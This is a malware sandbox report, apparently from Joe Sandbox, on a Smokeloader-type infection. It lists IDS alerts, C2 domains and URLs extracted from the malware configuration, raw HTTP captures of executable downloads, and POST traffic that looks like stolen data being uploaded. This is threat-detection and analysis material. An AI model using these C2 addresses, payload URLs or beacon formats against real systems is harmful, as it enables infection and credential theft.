Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49773 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49774 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49775 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49776 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49777 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49778 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49779 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49780 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49781 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49782 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49783 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49784 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49785 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49786 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49787 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49788 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49789 -> 88.225.215.104:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 190.187.52.42 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 88.225.215.104 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://lobulraualov.in.net/tmp/index.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 08:30:27 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 08:30:02 GMTConnection: keep-aliveETag: "6652f30a-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 08:30:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 08:26:18 GMTETag: "205e00-6195727a15e80"Accept-Ranges: bytesContent-Length: 2121216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 20 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 4a 22 00 00 00 70 0a 00 00 44 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 3c bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 08 09 00 00 10 00 00 00 0a 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 26 00 00 00 20 09 00 00 28 00 00 00 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 2d 0d 00 00 00 50 09 00 00 00 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 4a 22 00 00 00 60 09 00 00 24 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 90 09 00 00 00 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 a0 09 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 3c bd 00 00 00 b0 09 00 00 be 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 44 16 00 00 70 0a 00 00 44 16 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 00 00 00 00 00 00 5e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 190.187.52.42 190.187.52.42
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View ASN Name: AMERICATELPERUSAPE AMERICATELPERUSAPE
Source: Joe Sandbox View ASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
Source: Joe Sandbox View ASN Name: TTNETTR TTNETTR
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7083Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1229Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583478Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5557Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 129597Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jcnkksjnacxjwh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eaaqpotuqgvxxvep.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eskqecavndurqirx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pvhxcowxrsmsmxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhkcnscxetvodwbe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmdyxmgpkfrir.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsvttmlmwckhyv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmxjggdvslwul.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dsnbbvyutqhm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://alfdwfnhtcwp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://utrnyeeydifgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyidhbcjdpvriid.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqkwdxujhjkjfbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahlpadnysdsadbk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqdfdnedidrxaed.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdrbuklfbrraj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmvygvmqskvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efeegeullncj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: dbfhns.in
